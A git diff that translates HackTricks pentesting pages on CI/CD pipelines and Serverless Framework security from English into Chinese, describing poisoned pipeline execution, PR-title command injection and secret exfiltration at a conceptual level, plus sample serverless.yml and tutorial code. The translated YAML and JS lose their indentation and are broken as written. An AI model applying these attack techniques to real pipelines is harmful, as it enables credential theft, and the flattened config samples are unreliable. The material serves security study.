+> 即使某些 VCS 平台允许创建管道,在本节中我们将仅分析对源代码控制的潜在攻击。
-Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
+包含您项目源代码的平台包含敏感信息,用户需要非常小心在此平台内授予的权限。这些是 VCS 平台上攻击者可能滥用的一些常见问题:
-- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
-- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
- - **Register**: Some platforms will just allow external users to create an account.
- - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
- - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
-- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
- - If no secret is in place, the attacker could abuse the webhook of the third party platform
- - If the secret is in the URL, the same happens and the attacker also have the secret
-- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
- - Compromise the main branch to **compromise production**.
- - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
- - **Compromise the pipeline** (check next section)
+- **泄漏**:如果您的代码在提交中包含泄漏,并且攻击者可以访问该仓库(因为它是公开的或因为他有访问权限),他可能会发现这些泄漏。
+- **访问**:如果攻击者可以 **访问 VCS 平台内的帐户**,他可能会获得 **更多的可见性和权限**。
+- **注册**:某些平台只允许外部用户创建帐户。
+- **SSO**:某些平台不允许用户注册,但允许任何人使用有效的 SSO 访问(例如,攻击者可以使用他的 github 帐户进入)。
+- **凭据**:用户名+密码、个人令牌、ssh 密钥、Oauth 令牌、cookies……用户可以窃取多种类型的令牌以某种方式访问仓库。
+- **Webhooks**:VCS 平台允许生成 webhooks。如果它们没有用不可见的秘密 **保护**,则 **攻击者可能会滥用它们**。
+- 如果没有秘密,攻击者可能会滥用第三方平台的 webhook
+- 如果秘密在 URL 中,情况也是如此,攻击者也会拥有秘密
+- **代码妥协**:如果恶意行为者对仓库有某种 **写入** 访问权限,他可能会尝试 **注入恶意代码**。为了成功,他可能需要 **绕过分支保护**。这些操作可以以不同的目标进行:
+- 妥协主分支以 **妥协生产**。
+- 妥协主分支(或其他分支)以 **妥协开发者机器**(因为他们通常在自己的机器上执行测试、terraform 或其他操作)。
+- **妥协管道**(查看下一节)
## Pipelines Pentesting Methodology
-The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
-These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
+定义管道的最常见方法是使用 **托管在仓库中的 CI 配置文件**。该文件描述了执行作业的顺序、影响流程的条件和构建环境设置。\
+这些文件通常具有一致的名称和格式,例如 — Jenkinsfile(Jenkins)、.gitlab-ci.yml(GitLab)、.circleci/config.yml(CircleCI)和位于 .github/workflows 下的 GitHub Actions YAML 文件。当触发时,管道作业 **从选定的源中拉取代码**(例如提交/分支),并 **根据 CI 配置文件中指定的命令** 对该代码执行操作。
-Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
+因此,攻击者的最终目标是以某种方式 **妥协这些配置文件** 或 **它们执行的命令**。
### PPE - Poisoned Pipeline Execution
-The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
+毒化管道执行(PPE)路径利用 SCM 仓库中的权限来操纵 CI 管道并执行有害命令。具有必要权限的用户可以修改 CI 配置文件或管道作业使用的其他文件,以包含恶意命令。这会“毒化” CI 管道,导致这些恶意命令的执行。
-For a malicious actor to be successful performing a PPE attack he needs to be able to:
+为了使恶意行为者成功执行 PPE 攻击,他需要能够:
-- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
- - Note that sometimes an **external PR count as "write access"**.
-- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
- - For this, he might need to be able to **bypass branch protections**.
+- 拥有 **对 VCS 平台的写入访问权限**,因为通常在执行推送或拉取请求时会触发管道。(查看 VCS 渗透测试方法以获取获取访问权限的摘要)。
+- 注意,有时 **外部 PR 计入“写入访问”**。
+- 即使他拥有写入权限,他也需要确保他可以 **修改 CI 配置文件或其他配置所依赖的文件**。
+- 为此,他可能需要能够 **绕过分支保护**。
-There are 3 PPE flavours:
+有 3 种 PPE 风格:
-- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
-- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
-- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
- - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
+- **D-PPE**:**直接 PPE** 攻击发生在行为者 **修改将要执行的 CI 配置** 文件时。
+- **I-DDE**:**间接 PPE** 攻击发生在行为者 **修改** CI 配置文件所 **依赖的文件**(如 make 文件或 terraform 配置)时。
+- **公共 PPE 或 3PE**:在某些情况下,管道可以 **由没有写入访问权限的用户触发**(而且可能甚至不是组织的一部分),因为他们可以发送 PR。
+- **3PE 命令注入**:通常,CI/CD 管道会 **设置环境变量**,其中包含 **有关 PR 的信息**。如果该值可以被攻击者控制(如 PR 的标题),并且在 **危险位置**(如执行 **sh 命令**)中 **使用**,攻击者可能会 **在其中注入命令**。
### Exploitation Benefits
-Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
+了解毒化管道的 3 种风格后,让我们检查攻击者在成功利用后可能获得的内容:
-- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
- - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
-- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
- - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
- - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
- - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
- - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
-- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
+- **秘密**:如前所述,管道的作业需要 **特权**(检索代码、构建、部署……),这些特权通常在秘密中 **授予**。这些秘密通常可以通过 **环境变量或系统内的文件** 访问。因此,攻击者总是会尝试提取尽可能多的秘密。
+- 根据管道平台,攻击者 **可能需要在配置中指定秘密**。这意味着如果攻击者无法修改 CI 配置管道(例如 **I-PPE**),他可能 **只能提取该管道拥有的秘密**。
+- **计算**:代码在某处执行,具体取决于执行的位置,攻击者可能能够进一步转移。
+- **本地**:如果管道在本地执行,攻击者可能会进入 **具有更多资源的内部网络**。
+- **云**:攻击者可以访问 **云中的其他机器**,还可以 **提取** IAM 角色/服务帐户 **令牌** 以获得 **进一步的云内部访问**。
+- **平台机器**:有时作业将在 **管道平台机器** 内执行,这些机器通常位于 **没有更多访问权限** 的云中。
+- **选择它**:有时 **管道平台将配置多个机器**,如果您可以 **修改 CI 配置文件**,则可以 **指示要运行恶意代码的位置**。在这种情况下,攻击者可能会在每台可能的机器上运行反向 shell,以尝试进一步利用。
+- **妥协生产**:如果您在管道内部,并且最终版本是从中构建和部署的,您可能会 **妥协将要在生产中运行的代码**。
## More relevant info
### Tools & CIS Benchmark
-- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
+- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) 是一个开源工具,用于审计您的软件供应链堆栈的安全合规性,基于新的 [**CIS 软件供应链基准**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf)。审计集中在整个 SDLC 过程中,可以揭示从代码时间到部署时间的风险。
### Top 10 CI/CD Security Risk
-Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
+查看这篇关于 Cider 的前 10 大 CI/CD 风险的有趣文章:[**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
### Labs
-- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
-- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
+- 在每个平台上,您可以本地运行,您将找到如何本地启动它,以便您可以根据需要进行配置以进行测试
+- Gitea + Jenkins 实验室:[https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
### Automatic Tools
-- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
+- [**Checkov**](https://github.com/bridgecrewio/checkov):**Checkov** 是一个用于基础设施即代码的静态代码分析工具。
## References
- [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md
index bf1343702..a608574f4 100644
--- a/src/pentesting-ci-cd/serverless.com-security.md
+++ b/src/pentesting-ci-cd/serverless.com-security.md
@@ -2,302 +2,273 @@
{{#include ../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-### Organization
+### 组织
-An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications.
+一个 **组织** 是 Serverless Framework 生态系统中的最高级别实体。它代表一个 **集体团体**,例如公司、部门或任何大型实体,涵盖多个项目、团队和应用程序。
-### Team
+### 团队
-The **Team** are the users with access inside the organization. Teams help in organizing members based on roles. **`Collaborators`** can view and deploy existing apps, while **`Admins`** can create new apps and manage organization settings.
+**团队** 是在组织内有访问权限的用户。团队根据角色帮助组织成员。**`合作者`** 可以查看和部署现有应用,而 **`管理员`** 可以创建新应用并管理组织设置。
-### Application
+### 应用程序
-An **App** is a logical grouping of related services within an Organization. It represents a complete application composed of multiple serverless services that work together to provide a cohesive functionality.
+一个 **应用** 是组织内相关服务的逻辑分组。它代表一个完整的应用程序,由多个无服务器服务组成,这些服务协同工作以提供一致的功能。
-### **Services**
-
-A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables.
+### **服务**
+一个 **服务** 是无服务器应用程序的核心组件。它代表您的整个无服务器项目,封装了所需的所有功能、配置和资源。它通常在 `serverless.yml` 文件中定义,服务包括元数据,如服务名称、提供者配置、功能、事件、资源、插件和自定义变量。
```yaml
service: my-service
provider:
- name: aws
- runtime: nodejs14.x
+name: aws
+runtime: nodejs14.x
functions:
- hello:
- handler: handler.hello
+hello:
+handler: handler.hello
```
-
Function
-A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events.
-
-It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings.
+一个 **Function** 代表一个单一的无服务器函数,例如 AWS Lambda 函数。它包含响应事件时执行的代码。
+它在 `serverless.yml` 的 `functions` 部分下定义,指定处理程序、运行时、事件、环境变量和其他设置。
```yaml
functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
```
-
-Event
+事件
-**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed.
-
-Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more.
+**事件** 是触发您无服务器函数的触发器。它们定义了函数应该如何以及何时执行。
+常见的事件类型包括 HTTP 请求、计划事件(cron 作业)、数据库事件、文件上传等。
```yaml
functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- - schedule:
- rate: rate(10 minutes)
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+- schedule:
+rate: rate(10 minutes)
```
-
-Resource
+资源
-**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles.
-
-They are specified under the `resources` section, often using CloudFormation syntax for AWS.
+**资源** 允许您定义您的服务所依赖的额外云资源,例如数据库、存储桶或 IAM 角色。
+它们在 `resources` 部分下指定,通常使用 AWS 的 CloudFormation 语法。
```yaml
resources:
- Resources:
- MyDynamoDBTable:
- Type: AWS::DynamoDB::Table
- Properties:
- TableName: my-table
- AttributeDefinitions:
- - AttributeName: id
- AttributeType: S
- KeySchema:
- - AttributeName: id
- KeyType: HASH
- ProvisionedThroughput:
- ReadCapacityUnits: 1
- WriteCapacityUnits: 1
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+TableName: my-table
+AttributeDefinitions:
+- AttributeName: id
+AttributeType: S
+KeySchema:
+- AttributeName: id
+KeyType: HASH
+ProvisionedThroughput:
+ReadCapacityUnits: 1
+WriteCapacityUnits: 1
```
-
-Provider
+提供者
-The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider.
-
-It includes details like the runtime, region, stage, and credentials.
+**Provider** 对象指定云服务提供商(例如,AWS、Azure、Google Cloud),并包含与该提供商相关的配置设置。
+它包括运行时、区域、阶段和凭据等详细信息。
```yaml
yamlCopy codeprovider:
- name: aws
- runtime: nodejs14.x
- region: us-east-1
- stage: dev
+name: aws
+runtime: nodejs14.x
+region: us-east-1
+stage: dev
```
-
-Stage and Region
-
-The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments.
+阶段和区域
+阶段代表不同的环境(例如,开发、预发布、生产),您的服务可以在这些环境中部署。它允许进行特定于环境的配置和部署。
```yaml
provider:
- stage: dev
+stage: dev
```
-
-The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations.
-
+区域指定了您的资源将要部署的地理区域。这对于延迟、合规性和可用性考虑非常重要。
```yaml
provider:
- region: us-west-2
+region: us-west-2
```
-
-Plugins
-
-**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm.
+插件
+**插件** 通过添加新功能或与其他工具和服务集成来扩展 Serverless Framework 的功能。它们在 `plugins` 部分定义,并通过 npm 安装。
```yaml
plugins:
- - serverless-offline
- - serverless-webpack
+- serverless-offline
+- serverless-webpack
```
-
-Layers
-
-**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions.
+层
+**层** 允许您将共享代码或依赖项单独打包和管理。这促进了可重用性并减少了部署包的大小。它们在 `layers` 部分下定义,并由函数引用。
```yaml
layers:
- commonLibs:
- path: layer-common
+commonLibs:
+path: layer-common
functions:
- hello:
- handler: handler.hello
- layers:
- - { Ref: CommonLibsLambdaLayer }
+hello:
+handler: handler.hello
+layers:
+- { Ref: CommonLibsLambdaLayer }
+```
+
+
+
+
+变量和自定义变量
+
+**变量** 通过允许使用在部署时解析的占位符来实现动态配置。
+
+- **语法:** `${variable}` 语法可以引用环境变量、文件内容或其他配置参数。
+
+```yaml
+functions:
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
+```
+
+* **自定义变量:** `custom` 部分用于定义用户特定的变量和配置,这些变量和配置可以在 `serverless.yml` 中重复使用。
+
+```yaml
+custom:
+tableName: my-dynamodb-table
+stage: ${opt:stage, 'dev'}
```
-Variables and Custom Variables
-
-**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time.
-
-- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters.
-
- ```yaml
- functions:
- hello:
- handler: handler.hello
- environment:
- TABLE_NAME: ${self:custom.tableName}
- ```
-
-* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`.
-
- ```yaml
- custom:
- tableName: my-dynamodb-table
- stage: ${opt:stage, 'dev'}
- ```
-
-
-
-
-
-Outputs
-
-**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment.
+输出
+**输出** 定义在服务部署后返回的值,例如资源 ARN、端点或其他有用信息。它们在 `outputs` 部分中指定,通常用于向其他服务公开信息或在部署后方便访问。
```yaml
¡outputs:
- ApiEndpoint:
- Description: "API Gateway endpoint URL"
- Value:
- Fn::Join:
- - ""
- - - "https://"
- - Ref: ApiGatewayRestApi
- - ".execute-api."
- - Ref: AWS::Region
- - ".amazonaws.com/"
- - Ref: AWS::Stage
+ApiEndpoint:
+Description: "API Gateway endpoint URL"
+Value:
+Fn::Join:
+- ""
+- - "https://"
+- Ref: ApiGatewayRestApi
+- ".execute-api."
+- Ref: AWS::Region
+- ".amazonaws.com/"
+- Ref: AWS::Stage
```
-
-IAM Roles and Permissions
-
-**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions.
+IAM角色和权限
+**IAM角色和权限** 定义了您函数和其他资源的安全凭证和访问权限。它们在 `provider` 或单个函数设置下进行管理,以指定必要的权限。
```yaml
provider:
- [...]
- iam:
- role:
- statements:
- - Effect: 'Allow'
- Action:
- - 'dynamodb:PutItem'
- - 'dynamodb:Get*'
- - 'dynamodb:Scan*'
- - 'dynamodb:UpdateItem'
- - 'dynamodb:DeleteItem'
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
```
-
-Environment Variables
-
-**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions.
+环境变量
+**变量** 允许您将配置设置和秘密传递给您的函数,而无需将它们硬编码。它们在提供者或单个函数的 `environment` 部分下定义。
```yaml
provider:
- environment:
- STAGE: ${self:provider.stage}
+environment:
+STAGE: ${self:provider.stage}
functions:
- hello:
- handler: handler.hello
- environment:
- TABLE_NAME: ${self:custom.tableName}
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
```
-
-Dependencies
-
-**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`.
+依赖
+**依赖** 管理您的函数所需的外部库和模块。它们通常通过像 npm 或 pip 这样的包管理器处理,并使用 `serverless-webpack` 等工具或插件与您的部署包捆绑在一起。
```yaml
plugins:
- - serverless-webpack
+- serverless-webpack
```
-
Hooks
-**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments.
-
+**Hooks** 允许您在部署生命周期的特定时刻运行自定义脚本或命令。它们通过插件或在 `serverless.yml` 中定义,以在部署之前或之后执行操作。
```yaml
custom:
- hooks:
- before:deploy:deploy: echo "Starting deployment..."
+hooks:
+before:deploy:deploy: echo "Starting deployment..."
```
-
-### Tutorial
+### 教程
-This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial):
-
-1. Create an AWS account (Serverless.com start in AWS infrastructure)
-2. Create an account in serverless.com
-3. Create an app:
+这是官方教程的摘要 [**来自文档**](https://www.serverless.com/framework/docs/tutorial):
+1. 创建一个 AWS 账户 (Serverless.com 在 AWS 基础设施上启动)
+2. 在 serverless.com 创建一个账户
+3. 创建一个应用:
```bash
# Create temp folder for the tutorial
mkdir /tmp/serverless-tutorial
@@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API)
## Create A New App
## Indicate a name like "tutorialapp)
```
-
-This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function:
+这应该创建了一个名为 **app** 的 `tutorialapp`,您可以在 [serverless.com](serverless.com-security.md) 中检查,并且创建了一个名为 `Tutorial` 的文件夹,其中包含文件 **`handler.js`**,该文件包含一些 JS 代码和 `helloworld` 代码,以及文件 **`serverless.yml`** 声明该函数:
{{#tabs }}
{{#tab name="handler.js" }}
-
```javascript
exports.hello = async (event) => {
- return {
- statusCode: 200,
- body: JSON.stringify({
- message: "Go Serverless v4! Your function executed successfully!",
- }),
- }
+return {
+statusCode: 200,
+body: JSON.stringify({
+message: "Go Serverless v4! Your function executed successfully!",
+}),
+}
}
```
-
{{#endtab }}
{{#tab name="serverless.yml" }}
-
```yaml
# "org" ensures this Service is used with the correct Serverless Framework Access Key.
org: testing12342
@@ -342,130 +309,122 @@ app: tutorialapp
service: Tutorial
provider:
- name: aws
- runtime: nodejs20.x
+name: aws
+runtime: nodejs20.x
functions:
- hello:
- handler: handler.hello
- events:
- - httpApi:
- path: /
- method: get
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
```
-
{{#endtab }}
{{#endtabs }}
-4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`.
- 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
- 2. This template generates a role called **`SFRole-`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role.
+4. 创建一个 AWS 提供者,进入 `https://app.serverless.com//settings/providers?providerId=new&provider=aws` 的 **仪表板**。
+1. 为了给 `serverless.com` 访问 AWS 的权限,它会要求运行一个 cloudformation 堆栈,使用这个配置文件(在撰写本文时):[https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
+2. 这个模板生成一个名为 **`SFRole-`** 的角色,具有 **`arn:aws:iam::aws:policy/AdministratorAccess`** 的权限,允许 `Serverless.com` AWS 账户访问该角色。
Yaml roleTemplate
-
```yaml
Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments.
Resources:
- SFRole:
- Type: AWS::IAM::Role
- Properties:
- AssumeRolePolicyDocument:
- Version: "2012-10-17"
- Statement:
- - Effect: Allow
- Principal:
- AWS: arn:aws:iam::486128539022:root
- Action:
- - sts:AssumeRole
- Condition:
- StringEquals:
- sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
- Path: /
- RoleName: !Ref RoleName
- ManagedPolicyArns:
- - arn:aws:iam::aws:policy/AdministratorAccess
- ReporterFunction:
- Type: Custom::ServerlessFrameworkReporter
- Properties:
- ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
- OrgUid: !Ref OrgUid
- RoleArn: !GetAtt SFRole.Arn
- Alias: !Ref Alias
+SFRole:
+Type: AWS::IAM::Role
+Properties:
+AssumeRolePolicyDocument:
+Version: "2012-10-17"
+Statement:
+- Effect: Allow
+Principal:
+AWS: arn:aws:iam::486128539022:root
+Action:
+- sts:AssumeRole
+Condition:
+StringEquals:
+sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
+Path: /
+RoleName: !Ref RoleName
+ManagedPolicyArns:
+- arn:aws:iam::aws:policy/AdministratorAccess
+ReporterFunction:
+Type: Custom::ServerlessFrameworkReporter
+Properties:
+ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
+OrgUid: !Ref OrgUid
+RoleArn: !GetAtt SFRole.Arn
+Alias: !Ref Alias
Outputs:
- SFRoleArn:
- Description: "ARN for the IAM Role used by Serverless Framework"
- Value: !GetAtt SFRole.Arn
+SFRoleArn:
+Description: "ARN for the IAM Role used by Serverless Framework"
+Value: !GetAtt SFRole.Arn
Parameters:
- OrgUid:
- Description: Serverless Framework Org Uid
- Type: String
- Alias:
- Description: Serverless Framework Provider Alias
- Type: String
- RoleName:
- Description: Serverless Framework Role Name
- Type: String
+OrgUid:
+Description: Serverless Framework Org Uid
+Type: String
+Alias:
+Description: Serverless Framework Provider Alias
+Type: String
+RoleName:
+Description: Serverless Framework Role Name
+Type: String
```
-
-Trust Relationship
-
+信任关系
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam::486128539022:root"
- },
- "Action": "sts:AssumeRole",
- "Condition": {
- "StringEquals": {
- "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
- }
- }
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::486128539022:root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {
+"StringEquals": {
+"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
+}
+}
+}
+]
}
```
-
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas.
+5. 教程要求创建文件 `createCustomer.js`,该文件基本上会创建一个由新 JS 文件处理的新 API 端点,并要求修改 `serverless.yml` 文件以生成一个 **新的 DynamoDB 表**,定义一个 **环境变量**,以及将使用生成的 lambdas 的角色。
{{#tabs }}
{{#tab name="createCustomer.js" }}
-
```javascript
"use strict"
const AWS = require("aws-sdk")
module.exports.createCustomer = async (event) => {
- const body = JSON.parse(Buffer.from(event.body, "base64").toString())
- const dynamoDb = new AWS.DynamoDB.DocumentClient()
- const putParams = {
- TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
- Item: {
- primary_key: body.name,
- email: body.email,
- },
- }
- await dynamoDb.put(putParams).promise()
- return {
- statusCode: 201,
- }
+const body = JSON.parse(Buffer.from(event.body, "base64").toString())
+const dynamoDb = new AWS.DynamoDB.DocumentClient()
+const putParams = {
+TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
+Item: {
+primary_key: body.name,
+email: body.email,
+},
+}
+await dynamoDb.put(putParams).promise()
+return {
+statusCode: 201,
+}
}
```
-
{{#endtab }}
{{#tab name="serverless.yml" }}
-
```yaml
# "org" ensures this Service is used with the correct Serverless Framework Access Key.
org: testing12342
@@ -475,388 +434,379 @@ app: tutorialapp
service: Tutorial
provider:
- name: aws
- runtime: nodejs20.x
- environment:
- DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
- iam:
- role:
- statements:
- - Effect: "Allow"
- Action:
- - "dynamodb:PutItem"
- - "dynamodb:Get*"
- - "dynamodb:Scan*"
- - "dynamodb:UpdateItem"
- - "dynamodb:DeleteItem"
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+name: aws
+runtime: nodejs20.x
+environment:
+DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
+iam:
+role:
+statements:
+- Effect: "Allow"
+Action:
+- "dynamodb:PutItem"
+- "dynamodb:Get*"
+- "dynamodb:Scan*"
+- "dynamodb:UpdateItem"
+- "dynamodb:DeleteItem"
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
functions:
- hello:
- handler: handler.hello
- events:
- - httpApi:
- path: /
- method: get
- createCustomer:
- handler: createCustomer.createCustomer
- events:
- - httpApi:
- path: /
- method: post
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
+createCustomer:
+handler: createCustomer.createCustomer
+events:
+- httpApi:
+path: /
+method: post
resources:
- Resources:
- CustomerTable:
